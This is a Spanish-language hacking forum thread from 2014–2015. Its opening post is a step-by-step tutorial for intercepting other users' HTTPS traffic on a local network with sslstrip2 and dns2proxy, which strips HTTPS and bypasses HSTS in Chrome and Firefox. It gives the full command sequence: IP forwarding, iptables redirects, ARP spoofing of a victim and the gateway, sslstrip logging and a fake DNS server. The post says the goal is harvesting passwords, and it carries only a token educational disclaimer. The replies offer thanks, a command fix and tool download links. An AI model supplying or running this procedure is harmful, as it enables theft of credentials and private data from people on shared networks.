comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Evadiendo HSTS en CHROME y FIREFOX con sslstrip2

  • 39 Respuestas
  • 19855 Vistas

0 Usuarios y 3 Visitantes están viendo este tema.

Desconectado denx0

  • *
  • Underc0der
  • Mensajes: 5
  • Actividad:
    0%
  • Reputación 1
  • http://denx0sec.blogspot.com
    • Ver Perfil
    • denx0sec
  • Twitter: https://twitter.com/denx0sec
« en: Diciembre 01, 2014, 03:55:50 pm »

Había una vez, hace no mucho tiempo. Un mundo en el que la información transmitida por Internet viajaba en texto plano, Por lo cual  cualquier sniffer como cain, ettercap, etc podían Fácilmente  interceptar tu información, obtener tus contraseñas de facebook, hotmail, gmail y espiarte a diestra y siniestra.

Para mitigar este gran problema de seguridad decidieron implementar un protocolo mucho mas seguro llamado HTTPS que lo que hace es cifrar la información en SSL. En poco tiempo muchas paginas importantes como entidades bancarias, Paginas de servicios, gmail, hotmail, facebook, etc,  Migraron a este protocolo.

Por un tiempo todo funcionó a la perfección. nadie podía sniffear los datos de las paginas cifradas en HTTPS. pero eso cambió en 2009 cuando en una conferencia llamada Black Hat se presentó una herramienta bastante curiosa llamada SSLSTRIP... ¿Que hace esta Herramienta?.
 Lo que hace es que reemplaza todas las peticiones HTTPS A HTTP y luego hace MITM entre el cliente y servidor, permitiendo al atacante abolir el protocolo HTTPS y hacer que los datos viajen en texto plano.

Por años se podían sniffear los datos de las paginas aun en HTTPS, por eso es que después 
 se implementó un nuevo mecanismo de política de seguridad llamado HSTS que lo que hace es que informa al navegador que las conexiones siempre se deben dar bajo SSL/TLS, esta medida de seguridad fue implementada en muchas paginas web pero no solo eso, con el paso del tiempo los navegadores CHROME y FIREFOX incluyeron esta política en sus navegadores  por lo que la herramienta SSLSTRIP dejó de ser efectiva para estos navegadores, Solo seguía  funcionando en Internet explorer.

Pero hace unos meses LeonardoNve lanzó una versión modificada de SSLSTRIP a la cual llamó "SSLSTRIP2" . Esta nueva versión permite evadir las normas de seguridad HSTS y con la ayuda de otra herramienta llamada dns2proxy Permite hacer lo que hasta hoy era imposible: Sniffear conexiones en navegadores como FIREFOX y CHROME.

A continuación te muestro como llevar a cabo esta técnica no sin antes recordarte que esto es con fines Educativos.

Lo primero que necesitaras serán las 2 herramientas antes mencionadas sslstrip2 y dns2proxy
las 2 las puedes descargar directamente desde aquí:

sslstrip2
Código: [Seleccionar]
https://github.com/byt3bl33d3r/sslstrip2
dns2proxy
Código: [Seleccionar]
https://github.com/LeonardoNve/dns2proxy
una vez descomprimidas puedes escoger entre Instalar sslstrip2 o Ejecutarla directamente

Para instalarlo solo basta ejecutar el archivo setup.py de la siguiente manera:

Código: [Seleccionar]
python setup.py install
si tenías una versión anterior la remplazará.

Ahora si comencemos el Ataque:

Primero necesitamos activar el ip forward con el siguiente comando:

Código: [Seleccionar]
echo "1" > /proc/sys/net/ipv4/ip_forward
agregamos estas reglas de iptables:

Código: [Seleccionar]
iptables --flush
Código: [Seleccionar]
iptables --flush -t nat
Código: [Seleccionar]
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 9000
Código: [Seleccionar]
iptables -t nat -A PREROUTING -p udp --destination-port 53 -j REDIRECT --to-port 53
Iniciamos arpspoof

Código: [Seleccionar]
arpspoof -i eth0 -t IP-VICTIMA IP-GATEWAY
Código: [Seleccionar]
arpspoof -i eth0 -t GATEWAY IP-VICTIMA
Una vez hecho eso solo es cuestión de iniciar sslstrip

Código: [Seleccionar]
sslstrip -l 9000 -a -w log.txt
y por ultimo para que funcione el ataque debemos de correr dns2proxy que crea un falso servidor DNS e interactua con iptables para reenviar las conecciónes:

Código: [Seleccionar]
python dns2proxy
listo .. con esto toda la información del objetivo llegará a nosotros en texto plano.

solo queda abrir el archivo log.txt que generó sslstrip y ahí estará toda la información.

Aquí les dejo un vídeo del proceso.
saludos y Happy hacking
« Última modificación: Noviembre 13, 2016, 08:10:50 pm por puntoCL »

Desconectado arthusu

  • *
  • Underc0der
  • Mensajes: 552
  • Actividad:
    3.33%
  • Reputación 2
  • Yo solo se que no se nada - Socrátes
    • Ver Perfil
    • Arthusu BLOG
  • Skype: arthusuxD
« Respuesta #1 en: Diciembre 01, 2014, 11:08:37 pm »
Buen post +Karma
 
Pentest - Hacking & Security Services

Contact me: arthusu@gmail.com

Desconectado Theraritho5

  • *
  • Underc0der
  • Mensajes: 26
  • Actividad:
    0%
  • Reputación -1
  • Curioso :(
    • Ver Perfil
  • Skype: Theraritho5
« Respuesta #2 en: Diciembre 02, 2014, 01:47:51 am »
Que buen aporte :D

Desconectado willymtx

  • *
  • Underc0der
  • Mensajes: 11
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #3 en: Diciembre 02, 2014, 03:34:36 pm »
Excelente aporte Denx0

gracias

Desconectado blackdrake

  • *
  • Co Admin
  • Mensajes: 1914
  • Actividad:
    0%
  • Reputación 15
    • Ver Perfil
« Respuesta #4 en: Diciembre 03, 2014, 09:46:45 am »
Muy buen aporte denx0, espero seguir viéndote por el foro :)

Un saludo.



Desconectado heil

  • *
  • Underc0der
  • Mensajes: 1
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #5 en: Diciembre 18, 2014, 06:35:49 pm »
Muchas gracias, pero al ingresar el comando

iptables --flush -t -nat

me dice:

iptables v1.4.14: can't initialize iptables table `-nat': Table does not exist (do you need to insmod?)
Perhaps iptables or your kernel needs to be upgraded.

Tengo Kali completamente actualizado, saludos.

Desconectado denx0

  • *
  • Underc0der
  • Mensajes: 5
  • Actividad:
    0%
  • Reputación 1
  • http://denx0sec.blogspot.com
    • Ver Perfil
    • denx0sec
  • Twitter: https://twitter.com/denx0sec
« Respuesta #6 en: Diciembre 19, 2014, 04:36:10 pm »
cierto .. un pequeño error de redacción  :P: antes de nat no lleva "-"

quedaría así: iptables --flush -t nat


Desconectado NewDealerKids

  • *
  • Underc0der
  • Mensajes: 11
  • Actividad:
    0%
  • Reputación 0
  • Cometo errores pero no soy un traidor
    • Ver Perfil
  • Skype: lucianolisandro
  • Twitter: lucianolmendez
« Respuesta #7 en: Abril 21, 2015, 06:55:04 pm »
Hola Amigos... probe la primer version de sslstrip y funciona solo c explorer...
estuve probando el 2  pero no me funciona.. puede ser q ya no funcione actualmente?

   espero su respuesta!
Es irrevocable el paso de átomos a bits.

Desconectado IJ[0]SEE

  • *
  • Underc0der
  • Mensajes: 57
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
  • Skype: ij0see
« Respuesta #8 en: Abril 22, 2015, 04:05:49 pm »
Pasa link para descargar que este tio lo ha retirado

Desconectado n4pst3r

  • *
  • Underc0der
  • Mensajes: 41
  • Actividad:
    1.67%
  • Reputación 0
    • Ver Perfil
    • r00tc0d3rs
    • Email
  • Skype: n4pst3rh4ck
« Respuesta #9 en: Abril 24, 2015, 07:14:09 pm »
Hola DENX0, de casualidad tendras el .zip del sslstrip2, sinceramente no logro encontrarlo. saludos y buen trabajo :)

Desconectado WhiZ

  • *
  • Underc0der
  • Mensajes: 395
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #10 en: Abril 24, 2015, 08:14:11 pm »
Hola DENX0, de casualidad tendras el .zip del sslstrip2, sinceramente no logro encontrarlo. saludos y buen trabajo :)

Jaja decime que es joda xD... Acá lo tenés.

La próxima podrías buscarlo un poco mejor. Lo digo por esto:







Espero que te sirva.

Saludos!
WhiZ


Desconectado IJ[0]SEE

  • *
  • Underc0der
  • Mensajes: 57
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
  • Skype: ij0see
« Respuesta #11 en: Abril 26, 2015, 06:04:17 pm »
Hola DENX0, de casualidad tendras el .zip del sslstrip2, sinceramente no logro encontrarlo. saludos y buen trabajo :)

Jaja decime que es joda xD... Acá lo tenés.

La próxima podrías buscarlo un poco mejor. Lo digo por esto:







Espero que te sirva.

Saludos!
WhiZ
Se refiere al original hay no viene el archivo lo retiró.

Desconectado n4pst3r

  • *
  • Underc0der
  • Mensajes: 41
  • Actividad:
    1.67%
  • Reputación 0
    • Ver Perfil
    • r00tc0d3rs
    • Email
  • Skype: n4pst3rh4ck
« Respuesta #12 en: Abril 27, 2015, 06:51:14 pm »
Estimado WHIZ, si te das de cuenta el autor borro la herramienta y el link que publicaste no descarga nada respecto a la herramienta, la he buscado antes de que me dijeras, por tal motivo   publique. xD sin embargo Gracias por responder, Saludos

Dejo link con la tool https://github.com/singe/sslstrip2
« Última modificación: Abril 27, 2015, 06:58:21 pm por n4pst3r »

Desconectado WhiZ

  • *
  • Underc0der
  • Mensajes: 395
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #13 en: Abril 27, 2015, 07:43:29 pm »
Estimado WHIZ, si te das de cuenta el autor borro la herramienta y el link que publicaste no descarga nada respecto a la herramienta, la he buscado antes de que me dijeras, por tal motivo   publique. xD sin embargo Gracias por responder, Saludos

Dejo link con la tool https://github.com/singe/sslstrip2

Jaja mil disculpas por mi respuesta estúpida y arrogante. No suelo responder así. Ahora estoy pagando por mi mala conducta.

Saludos y gracias por la enseñanza! xD
WhiZ


Desconectado blackdrake

  • *
  • Co Admin
  • Mensajes: 1914
  • Actividad:
    0%
  • Reputación 15
    • Ver Perfil
« Respuesta #14 en: Abril 27, 2015, 08:16:29 pm »
Estimado WHIZ, si te das de cuenta el autor borro la herramienta y el link que publicaste no descarga nada respecto a la herramienta, la he buscado antes de que me dijeras, por tal motivo   publique. xD sin embargo Gracias por responder, Saludos

Dejo link con la tool https://github.com/singe/sslstrip2

Jaja mil disculpas por mi respuesta estúpida y arrogante. No suelo responder así. Ahora estoy pagando por mi mala conducta.

Saludos y gracias por la enseñanza! xD
WhiZ


Pasa link para descargar que este tio lo ha retirado

Hola DENX0, de casualidad tendras el .zip del sslstrip2, sinceramente no logro encontrarlo. saludos y buen trabajo :)

Aquí lo teneis: https://github.com/LeonardoNve/sslstrip2/tree/892b014bd1b62e01f5ea0924839d08a931a6a2b1

Un saludo.



Desconectado Sebacordera

  • *
  • Underc0der
  • Mensajes: 3
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #15 en: Mayo 20, 2015, 03:24:28 pm »
Hola, algun link donde pueda bajar dns2proxy?

Gracias!

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5409
  • Actividad:
    20%
  • Reputación 33
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« Respuesta #16 en: Mayo 20, 2015, 03:36:18 pm »
@Sebacordera, fijate si te sirve:

https://github.com/LeonardoNve/dns2proxy

Saludos!
ANTRAX


Desconectado Sebacordera

  • *
  • Underc0der
  • Mensajes: 3
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #17 en: Mayo 20, 2015, 03:50:17 pm »
El problema es que ese link esta vacio, no esta más el dns2proxy para bajarlo!
Dice: NO MORE OPEN DISCLOSURE... tuvo que borrar el repositorio.
Algun otro lugar de donde poder bajarlo??

Gracias!

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5409
  • Actividad:
    20%
  • Reputación 33
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« Respuesta #18 en: Mayo 20, 2015, 04:21:54 pm »
@Sebacordera, fijate desde acá entonces:

https://github.com/moxie0/sslstrip

Saludos!
ANTRAX


Desconectado D4RKS0N1K

  • *
  • Underc0der
  • Mensajes: 119
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #19 en: Mayo 20, 2015, 04:28:36 pm »
¿Las herramientas que mencionas solo funcionan bajo Linux o alguna de sus distribuciones?¿Este tipo de ataques están dirigidos hacia una máquina , en qué parte de los comandos se establece dicha máquina , es decir su IP o algún otro rasgo diferenciador?

Un saludo :)

 

¿Te gustó el post? COMPARTILO!



[BeEF Framework] Falsa actualización de flash + complemento malicioso en Firefox

Iniciado por LionSec

Respuestas: 4
Vistas: 2291
Último mensaje Noviembre 26, 2014, 12:07:31 pm
por LionSec
Como ver el historial del modo incógnito (Google Chrome)

Iniciado por Develoz

Respuestas: 4
Vistas: 7072
Último mensaje Julio 25, 2018, 04:42:08 pm
por Letal
Gumshoe extensión (keylogger en Google Chrome)

Iniciado por amir.MH

Respuestas: 4
Vistas: 3171
Último mensaje Enero 04, 2017, 07:12:12 pm
por amir.MH
Descubrir Contraseñas Ocultas Por Asteriscos del Navegador Firefox

Iniciado por Devilboy

Respuestas: 5
Vistas: 3571
Último mensaje Mayo 17, 2011, 01:50:47 am
por magicbone
Comprometiendo un equipo mediante una extension de Firefox falsa

Iniciado por Pr0ph3t

Respuestas: 0
Vistas: 2046
Último mensaje Junio 01, 2012, 09:22:19 am
por Pr0ph3t